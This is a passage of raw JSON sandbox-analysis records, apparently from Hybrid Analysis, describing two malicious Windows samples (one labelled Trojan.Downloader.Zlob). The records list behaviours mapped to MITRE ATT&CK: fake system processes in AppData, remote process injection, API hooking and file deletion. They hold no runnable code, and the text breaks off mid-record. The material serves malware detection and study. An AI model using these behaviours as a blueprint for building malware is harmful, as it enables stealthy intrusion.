\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\services.exe\" for deletion\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\lsass.exe\" for deletion\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" for deletion\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-31", "type": 6, "relevance": 9, "name": "Tries to access unusual system drive letters", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched \"K:\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched \"L:\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched \"M:\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched \"N:\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched \"O:\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched \"P:\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched \"Q:\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched \"R:\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched \"S:\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched \"T:\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched \"U:\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched \"V:\"\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" touched \"W:\"", "origin": "API Call", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" (UID: 00000000-00006008)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005948)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002452)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004240)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003452)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003996)\n Spawned process \"D3_08.exe\" (UID: 00000000-00002952)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004068)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004372)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00001176)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004364)\n Spawned process \"D3_08.exe\" (UID: 00000000-00002444)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00000272)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005880)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00001960)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003964)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003572)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00002304)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003728)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002344)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003232)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004336)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004348)\n Spawned process \"D3_08.exe\" (UID: 00000000-00000916)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00000952)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003144)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003376)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00001864)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004268)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00006096)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00000572)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003328)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003448)\n Spawned process \"D3_08.exe\" (UID: 00000000-00001352)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003280)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00001340)\n Spawned process \"D3_08.exe\" (UID: 00000000-00002080)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00001584)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00000132)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00000472)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00001252)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00000356)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003488)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004012)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003624)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003596)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004432)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004064)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003716)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003224)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003920)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003084)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003764)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004480)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" allocated memory in \"C:\\85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\"\n \"D3_08.exe\" allocated memory in \"%WINDIR%\\D3_08.exe\"\n \"IExplorer.exe\" allocated memory in \"%WINDIR%\\system32\\IExplorer.exe\"\n \"WINLOGON.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\"\n \"CSRSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\CSRSS.EXE\"\n \"SERVICES.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SERVICES.EXE\"\n \"LSASS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\LSASS.EXE\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 376)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 376)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 376)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 376)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 376)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 376)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 580)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 580)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 580)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 612)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 612)\n \"85310459893043ce3ec9b097505814231813953b6fa0dd66b43e1ded5bda92f7.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 612)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 368)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 368)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 368)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 420)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 420)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 420)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 368)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 368)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 368)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 420)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 420)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 420)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 368)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 368)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 368)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 420)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 420)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 420)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 368)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 368)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-33", "type": 9, "relevance": 10, "name": "Creates a fake system process", "description": "Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003996)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004068)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00001176)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004364)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00000272)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00001960)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003964)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00002304)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003728)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00002344)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003232)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004348)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00000952)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003144)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003376)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00001864)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004268)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00006096)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003328)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003448)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003280)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00001340)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00001584)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00000132)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00000356)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003488)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004012)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003624)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003596)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004432)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004064)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003716)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003224)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003920)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003084)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003764)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004480)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003212)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003668)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003552)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005064)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003184)", "origin": "Monitored Target", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindNextFileA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"LSASS.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"CSRSS.EXE\"\n \"send@WS2_32.DLL\" in \"SMSS.EXE\"\n \"send@WS2_32.DLL\" in \"LSASS.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97
https://hybrid-analysis.com/sample/2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97
Hybrid Analysis - Killers
{"size": 53248, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97", "sha256": "2491baef6289ac1a0236bfa33af716a818e9d5efce30d5863dd1bae6b60c7f97", "av_detect": 76, "vx_family": "Trojan.Downloader.Zlob", "threat_score": 50, "threat_level": 2, "verdict": "malicious", "total_processes": 1, "total_signatures": 40, "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 7.10 (Visual Studio .NET 2003) (build: 3077)", "1 .RES Files linked with CVTRES.EXE 7.10 (Visual Studio .NET 2003) (build: 3052)", "1 .CPP Files compiled with CL.EXE 13.10 (Visual Studio .NET 2003) (build: 3077)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 7.10 (Visual Studio .NET 2003) (build: 2179)", "2 .LIB Files generated with LIB.EXE 7.10 (Visual Studio .NET 2003) (build: 2067)", "2 .LIB Files generated with LIB.EXE 7.00 (Visual Studio .NET 2002) (build: 9210)", "7 .CPP Files (with LTCG) compiled with CL.EXE 13.10 (Visual Studio .NET 2003) (build: 3077)", "6 .ASM Files assembled with MASM 7.10 (Visual Studio .NET 2002) (build: 3077)"], "file_analysis": ["File contains C++ code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 53}, "processes": [{"uid": "4beb0c1afc087e228f92256f98b0d614", "name": "<Input Sample>"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "informative_identifiers_count": 8}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": 